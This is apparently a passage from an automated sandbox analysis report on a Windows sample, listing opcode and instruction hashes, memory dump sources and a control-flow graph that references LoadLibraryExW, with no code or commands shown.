                                                                                                                                                              • Opcode ID: 4fade443ed70e7ea4e296834c2377ab8e9fe419959ccfe9c623c2d190dad401e
                                                                                                                                                              • Instruction ID: 1e04e0cc98313d02f17192b40f04cbbcf2a480ae071db936fe6f96ef3e7360f4
                                                                                                                                                              • Opcode Fuzzy Hash: 4fade443ed70e7ea4e296834c2377ab8e9fe419959ccfe9c623c2d190dad401e
                                                                                                                                                              • Instruction Fuzzy Hash: 76325F70A19A8D8FEBB8DF18C865BE937E1FF59301F10426AD84EC72A1DB745681CB41
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.2022902119.00007FFD9B720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B720000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ffd9b720000_BA9qyj2c9G.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: b0e00b946c19b4a0f650f2d1683d27896ce0c18bbc8cd3817af5314cda2263d4
                                                                                                                                                              • Instruction ID: 05a062ed5b7e3c90e86423b3cc0cd85612b6518aa5e59ecaeba7fb8f28666524
                                                                                                                                                              • Opcode Fuzzy Hash: b0e00b946c19b4a0f650f2d1683d27896ce0c18bbc8cd3817af5314cda2263d4
                                                                                                                                                              • Instruction Fuzzy Hash: 29325F70A19A8D8FDBB8DF28C8657E937E1FF59311F10422AD84DCB2A1DB745680CB41
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.2022902119.00007FFD9B720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B720000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ffd9b720000_BA9qyj2c9G.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: f6d6f563306bf2c8de4e157e43f67e55b26e1181b03e32a422e7e41000566277
                                                                                                                                                              • Instruction ID: a2b4a79b4d58dcf6ee37bcf96f99030d836f86ee6b0906fb7575ff84c7b03627
                                                                                                                                                              • Opcode Fuzzy Hash: f6d6f563306bf2c8de4e157e43f67e55b26e1181b03e32a422e7e41000566277
                                                                                                                                                              • Instruction Fuzzy Hash: 8F811E30E0961D8FDB99DF68C4A4AACB7B1FF59304F6441AED01DE72A6CA356981CB01
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.2022902119.00007FFD9B720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B720000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ffd9b720000_BA9qyj2c9G.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: e83cc4f1ccc4fa7700e169fb719522b8e86f9a9f6b8e49e2cf6e5b42eaeb175f
                                                                                                                                                              • Instruction ID: 0620b03805a7f57e089285972e012a5a37dec2ad64939f8d65303a1a8da9ee93
                                                                                                                                                              • Opcode Fuzzy Hash: e83cc4f1ccc4fa7700e169fb719522b8e86f9a9f6b8e49e2cf6e5b42eaeb175f
                                                                                                                                                              • Instruction Fuzzy Hash: 1F61A330E09B4E8FDB55DF68C4606A9B7F1FF99300F5541BAD409D72A6CA35E942C780
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.2022902119.00007FFD9B720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B720000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ffd9b720000_BA9qyj2c9G.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: bdcbcf09a91d786d6a12025860a600e5972a90559e70a26dca6fe9894b796dfb
                                                                                                                                                              • Instruction ID: ce08eace28970d02b7fd6fa2b00dfbf4002107527c8ae546ab0bf0799df305e9
                                                                                                                                                              • Opcode Fuzzy Hash: bdcbcf09a91d786d6a12025860a600e5972a90559e70a26dca6fe9894b796dfb
                                                                                                                                                              • Instruction Fuzzy Hash: 0021B770A19A1D8FDBA4EB58C855AB9B3F5FF55300F5142E9D14DE3261CE34AA80CF40
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.2022902119.00007FFD9B720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B720000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ffd9b720000_BA9qyj2c9G.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: bd6771e03500608e38f0c52b7bada118b3764c3d1980c421dfa89c4d5b8239f5
                                                                                                                                                              • Instruction ID: dac6c49503d03fd3ddf2dd7a3c80eae07ff62658063daa2ebc02d8510946d6e5
                                                                                                                                                              • Opcode Fuzzy Hash: bd6771e03500608e38f0c52b7bada118b3764c3d1980c421dfa89c4d5b8239f5
                                                                                                                                                              • Instruction Fuzzy Hash: 28F0F970E1961CCECBA4DB9894506ECB3B0FF59304F1006A9C10DE3661CF359A808B44
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.2022902119.00007FFD9B720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B720000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ffd9b720000_BA9qyj2c9G.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: 923a44ee5c7f590134229cb8d81dac0a028129fd6b32b392bca7171ff6ede5b4
                                                                                                                                                              • Instruction ID: 18bf86b67b0fe6ea00b224f7ec1d22703e08fb6f1c7da8d95b9f7b8f84470f92
                                                                                                                                                              • Opcode Fuzzy Hash: 923a44ee5c7f590134229cb8d81dac0a028129fd6b32b392bca7171ff6ede5b4
                                                                                                                                                              • Instruction Fuzzy Hash: F4F0F470E0A61CCEDBA4DB989450AECB3B0FF59304F0006A9C10EE32A1CB31AA808F44
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.2022902119.00007FFD9B720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B720000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ffd9b720000_BA9qyj2c9G.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: 6df665093532ea47b04e8ce05fcf166874b7f9426310c7e458a53a6f2ac3aa5e
                                                                                                                                                              • Instruction ID: 43a9ff4859eba62a5ccc3998380e98eca22e25b51b06dd23f61d527c6b17c85d
                                                                                                                                                              • Opcode Fuzzy Hash: 6df665093532ea47b04e8ce05fcf166874b7f9426310c7e458a53a6f2ac3aa5e
                                                                                                                                                              • Instruction Fuzzy Hash: DDF0A470E0961CCEDBA4DA58D454AECB3B1FB55305F0016A9C10DE3661CB359A808B44

                                                                                                                                                              Control-flow Graph (rendered graph omitted; the original colour legend marked basic blocks as Executed or Not Executed)
                                                                                                                                                              control_flow_graph 1040 7ffd9b722378-7ffd9b7260ae 1042 7ffd9b7260b4-7ffd9b7260b9 1040->1042 1043 7ffd9b7261dc-7ffd9b7261e6 1040->1043 1044 7ffd9b7260bf-7ffd9b7260d7 1042->1044 1045 7ffd9b7261ab-7ffd9b7261b6 1042->1045 1050 7ffd9b7261e7-7ffd9b72621a 1043->1050 1047 7ffd9b7260d9-7ffd9b7260e4 1044->1047 1048 7ffd9b7260eb-7ffd9b726103 1044->1048 1049 7ffd9b7261b7-7ffd9b7261c0 1045->1049 1052 7ffd9b726104-7ffd9b72610f 1047->1052 1053 7ffd9b7260e6-7ffd9b7260e9 1047->1053 1048->1052 1050->1049 1058 7ffd9b72621c-7ffd9b7262a0 1050->1058 1052->1050 1055 7ffd9b726115-7ffd9b726120 1052->1055 1053->1048 1055->1045 1057 7ffd9b726126-7ffd9b72612e 1055->1057 1057->1050 1059 7ffd9b726134-7ffd9b726140 1057->1059 1071 7ffd9b7262a2-7ffd9b7262b9 1058->1071 1072 7ffd9b7262bc-7ffd9b72631a LoadLibraryExW 1058->1072 1061 7ffd9b726142-7ffd9b72614e 1059->1061 1062 7ffd9b726193-7ffd9b72619b 1059->1062 1061->1050 1063 7ffd9b726154-7ffd9b726168 1061->1063 1062->1050 1065 7ffd9b72619d-7ffd9b7261a5 1062->1065 1066 7ffd9b7261c1-7ffd9b7261c6 1063->1066 1067 7ffd9b72616a-7ffd9b72617d 1063->1067 1065->1045 1065->1057 1068 7ffd9b726181-7ffd9b726191 1066->1068 1067->1068 1068->1062 1076 7ffd9b7261c8-7ffd9b7261db 1068->1076 1071->1072 1074 7ffd9b726322-7ffd9b726374 1072->1074 1075 7ffd9b72631c 1072->1075 1075->1074
                                                                                                                                                              APIs
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.2022902119.00007FFD9B720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B720000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ffd9b720000_BA9qyj2c9G.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: LibraryLoad
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 1029625771-0
                                                                                                                                                              • Opcode ID: a4431144cd33bd05409433258662d64b620be83a2db641e4d6199d9764a2d917
                                                                                                                                                              • Instruction ID: 034e1d17a8a767f355c80abedd7ef9a3c171b6d5188607a2f364d537f9a42ee2
                                                                                                                                                              • Opcode Fuzzy Hash: a4431144cd33bd05409433258662d64b620be83a2db641e4d6199d9764a2d917
                                                                                                                                                              • Instruction Fuzzy Hash: FAB19170A09B0D8FEB68DB98D895AB9B7E1FF59310F14426ED04DD3262DA35E942CB40
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.2022902119.00007FFD9B720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B720000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ffd9b720000_BA9qyj2c9G.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: b3730b4b15ef23f6ef98cf77a7b6079fe214cef39828c10a25556a85ae9e3ddb
                                                                                                                                                              • Instruction ID: 41b55eb76678623da3495a2041408639689a0104e7a4d9a0203e833146622604
                                                                                                                                                              • Opcode Fuzzy Hash: b3730b4b15ef23f6ef98cf77a7b6079fe214cef39828c10a25556a85ae9e3ddb
                                                                                                                                                              • Instruction Fuzzy Hash: 5F224D70A18A8D8FDBB9EF28C855BE937E1FF59301F10426AD85DC72A1DB746680CB41
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.2022902119.00007FFD9B720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B720000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ffd9b720000_BA9qyj2c9G.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: 664713fa8329b3dba23f60463932e5d3d1f821bb0bfd8d36a8b2d7a53e003433
                                                                                                                                                              • Instruction ID: ea9986899f89c78834d62638b43915beeddb61d319b13a54c2047d1369a4e610
                                                                                                                                                              • Opcode Fuzzy Hash: 664713fa8329b3dba23f60463932e5d3d1f821bb0bfd8d36a8b2d7a53e003433
                                                                                                                                                              • Instruction Fuzzy Hash: E3127F30A19A8D8FDB69DF68C895BE977E0FF55310F10427ED84EC72A2DA34A941CB41
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.2022902119.00007FFD9B720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B720000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ffd9b720000_BA9qyj2c9G.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: 401feb909ba1f4b221f27ea20b5db5bb547383a5c7c974bffd004fdef94b5580
                                                                                                                                                              • Instruction ID: e6c1c2da4db0703ff53f189a6dffe20c2ad7bec732e0bba1e7ad66bc4b015543
                                                                                                                                                              • Opcode Fuzzy Hash: 401feb909ba1f4b221f27ea20b5db5bb547383a5c7c974bffd004fdef94b5580
                                                                                                                                                              • Instruction Fuzzy Hash: 5002FA70E0961D8FDB99DF68C894BA8B7B1FF59304F5041EAD00DE72A5DA35AA81CF01
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.2022902119.00007FFD9B720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B720000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ffd9b720000_BA9qyj2c9G.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: 7d8769221060458f39e60322021742c1d732c0d28b711f8262035dd36e8deb9b
                                                                                                                                                              • Instruction ID: 958b0c631226a7872a16487729b30134ec6e0bf2c3c7750b19743f6c402ff5e4
                                                                                                                                                              • Opcode Fuzzy Hash: 7d8769221060458f39e60322021742c1d732c0d28b711f8262035dd36e8deb9b
                                                                                                                                                              • Instruction Fuzzy Hash: 62819370A08A8D8FDBA8EF58C855BE977E1FF59310F10416AE84DC7291DB74E984CB81
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.2022902119.00007FFD9B720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B720000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ffd9b720000_BA9qyj2c9G.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: 5132b6c6865e2720c98e28e2e5a204d552ebcf0fdc3c5590e3ffdc66e2a7b164
                                                                                                                                                              • Instruction ID: 0d32213a31e39dfb0476ece24ab193b8120d5254750abdacb0a2a49ac253ea3d
                                                                                                                                                              • Opcode Fuzzy Hash: 5132b6c6865e2720c98e28e2e5a204d552ebcf0fdc3c5590e3ffdc66e2a7b164
                                                                                                                                                              • Instruction Fuzzy Hash: 70717570A08A8D8FDBA8EF58C855BE977E1FB59310F10412AE80DC7291DB74E984CB41
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.2022902119.00007FFD9B720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B720000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ffd9b720000_BA9qyj2c9G.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: 87a7dbeee7adf1ddb3ebcf8eaa91aee636632f364ad275da5c14b17c3cd525cb
                                                                                                                                                              • Instruction ID: b0396688f45e0f297cede43c85a8789232ce025f0e6bf8e248164f316dd40021
                                                                                                                                                              • Opcode Fuzzy Hash: 87a7dbeee7adf1ddb3ebcf8eaa91aee636632f364ad275da5c14b17c3cd525cb
                                                                                                                                                              • Instruction Fuzzy Hash: 0251B634A19A5C8FDB95DB68D864AA8B7B1FF59300F5101E9D00DE7262DB31AE81CF01
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.2022902119.00007FFD9B720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B720000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ffd9b720000_BA9qyj2c9G.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: 216b0b79d5dfe0e7ac5af6c33cdd6a262f2c8c6cc542273b7cb527c9122201dc
                                                                                                                                                              • Instruction ID: b079160c810b5e3a899161421a5922a24288b8817a85431039cb5712aaa2f1f6
                                                                                                                                                              • Opcode Fuzzy Hash: 216b0b79d5dfe0e7ac5af6c33cdd6a262f2c8c6cc542273b7cb527c9122201dc
                                                                                                                                                              • Instruction Fuzzy Hash: 1C313A31E0422D8AEB68DE14E8A0BF9B3B1EB55304F8081ADD04EA7185DE356A86DF50
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.2022902119.00007FFD9B720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B720000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ffd9b720000_BA9qyj2c9G.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: 8034ef602f3639900f0d90c2f20e005c92448bfaafa4d55c8f024588cc476a81
                                                                                                                                                              • Instruction ID: f4c7dcc25bfeb87576ddf2c109e7e55c7fed1c7858425fe6cc01d309e6c9b80b
                                                                                                                                                              • Opcode Fuzzy Hash: 8034ef602f3639900f0d90c2f20e005c92448bfaafa4d55c8f024588cc476a81
                                                                                                                                                              • Instruction Fuzzy Hash: 2A01A720F0E54D4AEB649F64D860BBCB3B1EF57304F4196FAD01EE31AACD356A858B05